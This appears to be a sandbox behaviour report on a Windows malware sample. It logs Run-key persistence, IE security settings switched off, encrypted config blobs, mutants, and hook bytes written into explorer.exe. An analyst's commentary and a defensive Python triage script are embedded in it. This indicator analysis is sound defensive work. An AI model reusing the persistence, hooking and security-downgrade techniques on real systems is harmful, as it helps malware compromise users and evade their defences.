C:\WINDOWS\system32\adsldpc.dll query and write and read and execute image 76E10000 151552 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2890000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image 2890000 12288 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 3430000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 2890000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 2890000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 2890000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 2890000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 2890000 389120 own pid readonly success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy CleanCookies Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D E7 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} String "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} String "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 154 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Ebci Binary (value not reproduced in this copy of the report) success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Isic Binary 9F FB 8A 01 CE CB 89 99 78 8F 7A 24 04 EC BF 69 88 AB 89 AB 82 CC B0 25 36 12 91 E9 34 A9 EB 2E 57 1B F6 70 61 B9 F3 01 0E 38 7F 2B 4F B6 85 BD 81 0A 1D 97 0A 25 5D 94 98 63 9C 40 81 BC D2 5D 0F AC 89 8E EC 10 21 E4 E9 91 3B 00 C6 6B 24 D2 success or wait 1 1F89F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Enabled object name not found 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609 success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Okmaykid object name not found 1 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Okmaykid object name not found 1 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Ebci object name not found 1 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Ebci object name not found 1 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Okmaykid success or wait 1 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Okmaykid success or wait 1 1F89F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts NULL success or wait 1 1F89EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Ebci buffer overflow 4 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Ebci success or wait 2 1F89F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Ebci buffer overflow 2 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Ebci success or wait 1 1F89F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Okmaykid success or wait 2 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Ebci buffer overflow 2 1F89F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Ebci success or wait 1 1F89F86
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Okmaykid success or wait 2 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Okmaykid success or wait 2 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Isic object name not found 1 1F89F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid success or wait 2 1F89F57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} object name not found 1 1F89FC6
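The registry tables above are where most of the host-based indicators in this report sit, and they are easy to misread when skimmed as raw rows. In "Key value set": 1406 and 1609 are Internet Explorer zone actions ("Access data sources across domains" and "Display mixed content"), and DWORD 0 means Enable, so the sample is loosening those two controls in every zone; PhishingFilter\EnabledV8 = 0 switches off the IE8 phishing filter; the Run value is named with a GUID and points at an executable under the user's Application Data directory; and Giid\Okmaykid, Ebci and Isic are opaque binary blobs written under a non-standard HKCU\Software\Microsoft subkey, which is how the sample keeps its state. The GUID tail 185B-81F8EE8A3A3D in the Run value name recurs in most of the mutants created below and in the value the sample looks for under HKLM\SOFTWARE\Microsoft\Cryptography, so it is an identifier derived per installation rather than a constant worth matching literally; the pattern (GUID-named Run value into a random %APPDATA% folder plus binary values under a random Software\Microsoft key) is the reusable indicator. One caveat for the "Key value queried" table: the "buffer overflow" completion on the Ebci reads is STATUS_BUFFER_OVERFLOW from NtQueryValueKey when the supplied buffer is too small for the value, a normal size-probing return, not a memory-safety event. The following script is an added example, written here and not part of the Joebox report or of the sample: it parses a subset of the "Key value set" rows copied from the report, classifies each distinct value written, and checks the shared GUID tail against three mutant names from the "Mutant created" table. The zone, action and setting names are standard IE meanings; the category labels are my own.

```python
import re

# Rows copied verbatim from the report's "Key value set" table (a subset, to keep the
# example short). Two rows for the Run value are kept on purpose: the report lists the
# same write with count 1 and count 154, and triage must not double-report it.
KEY_VALUE_SET = r"""
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy CleanCookies Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1609 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 Dword 0 success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} String "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} String "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 154 1F89F1A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Isic Binary 9F FB 8A 01 CE CB 89 99 78 8F 7A 24 04 EC BF 69 88 AB 89 AB 82 CC B0 25 36 12 91 E9 34 A9 EB 2E 57 1B F6 70 61 B9 F3 01 0E 38 7F 2B 4F B6 85 BD 81 0A 1D 97 0A 25 5D 94 98 63 9C 40 81 BC D2 5D 0F AC 89 8E EC 10 21 E4 E9 91 3B 00 C6 6B 24 D2 success or wait 1 1F89F1A
"""
# Three names copied from the report's "Mutant created" table.
MUTANTS_CREATED = [
    r"\BaseNamedObjects\Global\{366BFE45-C6D8-191D-185B-81F8EE8A3A3D}",
    r"\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D}",
    r"\BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D}",
]

# Report row layout: Key Path, Name, Type, Data, Completion, Count, Source Address.
# Key paths may contain spaces ("Internet Explorer"), so anchor on the Type column.
ROW = re.compile(
    r"^(?P<key>HKEY_.+?)\s+(?P<name>\S+)\s+(?P<type>Dword|String|Binary)\s+"
    r"(?P<data>.+?)\s+(?P<status>[a-z][a-z ]*?)\s+(?P<count>\d+)\s+(?P<src>[0-9A-F]+)$"
)
GUID = re.compile(r"\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}")

# Standard meanings of the IE zone actions touched by the sample and of their DWORD values.
ZONE_ACTIONS = {"1406": "Access data sources across domains", "1609": "Display mixed content"}
ZONE_SETTING = {0: "Enable", 1: "Prompt", 3: "Disable"}
ZONE_NAMES = {"0": "My Computer", "1": "Local intranet", "2": "Trusted sites",
              "3": "Internet", "4": "Restricted sites"}


def parse_rows(table):
    rows = []
    for line in table.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            raise ValueError("unparsed row: " + line)
        rows.append(m.groupdict())
    return rows


def triage(rows):
    """Classify each distinct (key, value) written; returns (category, description) pairs."""
    findings, seen = [], set()
    for r in rows:
        ident = (r["key"], r["name"])
        if ident in seen:  # same write reported twice with different counts
            continue
        seen.add(ident)
        leaf = r["key"].rsplit("\\", 1)[-1]
        zone = re.search(r"\\Internet Settings\\Zones\\(\d)$", r["key"])
        if zone and r["name"] in ZONE_ACTIONS:
            v = int(r["data"])
            findings.append(("ie_zone", "zone %s (%s): %s = %s" % (
                zone.group(1), ZONE_NAMES[zone.group(1)], ZONE_ACTIONS[r["name"]], ZONE_SETTING.get(v, v))))
        elif leaf == "PhishingFilter" and r["name"] == "EnabledV8" and r["data"] == "0":
            findings.append(("ie_phishing_filter", "IE8 phishing filter disabled (EnabledV8 = 0)"))
        elif leaf == "Run":
            # GUID-named autostart entry pointing into the user profile is the pattern to keep.
            suspicious = bool(GUID.fullmatch(r["name"])) and "application data" in r["data"].lower()
            findings.append(("autostart", "Run value %s -> %s%s" % (
                r["name"], r["data"], " [GUID-named, user-profile path]" if suspicious else "")))
        elif r["type"] == "Binary" and re.search(r"\\Software\\Microsoft\\[^\\]+$", r["key"]):
            size = len(bytes.fromhex(r["data"]))
            findings.append(("config_blob", "%d-byte binary value %s under ...\\Software\\Microsoft\\%s"
                             % (size, r["name"], leaf)))
        else:
            findings.append(("other", "%s\\%s %s = %s" % (leaf, r["name"], r["type"], r["data"])))
    return findings


def shared_guid_tail(run_value_name, mutant_names):
    """Tail 'dddd-dddddddddddd' shared by the Run value name and every mutant, else None."""
    tails = {GUID.search(n).group(0)[-18:-1] for n in [run_value_name] + list(mutant_names)}
    return tails.pop() if len(tails) == 1 else None


if __name__ == "__main__":
    for category, text in triage(parse_rows(KEY_VALUE_SET)):
        print("%-18s %s" % (category, text))
    print("shared GUID tail:", shared_guid_tail("{BD75E342-DBDF-9203-185B-81F8EE8A3A3D}", MUTANTS_CREATED))
```

The same row parser works on the full "Key value set" table; the Okmaykid and Ebci blobs then show up as further config_blob findings, and the remaining zone rows bring the ie_zone count to nine.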
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{366BFE45-C6D8-191D-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2 1F7C0F6
\BaseNamedObjects\Global\{366BFE4A-C6D7-191D-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{D2C7FACE-C253-FDB1-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{3A87297E-11E3-15F1-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{3A87297F-11E2-15F1-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{C5C44599-7D04-EAB2-185B-81F8EE8A3A3D} success or wait 2 1F84C09
\BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 6 1F84B82
\BaseNamedObjects\Global\{C1D048FE-7063-EEA6-185B-81F8EE8A3A3D} success or wait 1 1F84C09
\BaseNamedObjects\Global\{50BFCA5D-F2C0-7FC9-185B-81F8EE8A3A3D} success or wait 1 1F7614F
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
604 C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat 0 success or wait 1 1F874EF
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3996 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
3984 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
3988 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
4012 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
4016 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
4020 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
4024 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F89D4C
772 1636 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1F876AC
+ Thread delayed
TID Delay Completion Count Source Address
1906 0s success or wait 1 1F7C324
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7E41AF7F 30 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1 1F8A4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 1810000 10 B8 35 00 00 00 E9 A9 D1 0F 7B success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C90D1AE 5 E9 33 B7 66 85 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181000A 10 68 6C 02 00 00 E9 1E 63 10 7B success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C91632D 5 E9 94 27 66 85 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810014 10 8B FF 55 8B EC E9 7C 11 00 7B success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C811195 5 E9 CE 79 76 85 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181001E 10 8B FF 55 8B EC E9 9B FA 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94FABE 5 E9 97 45 63 C4 success or wait 1 1F8A591
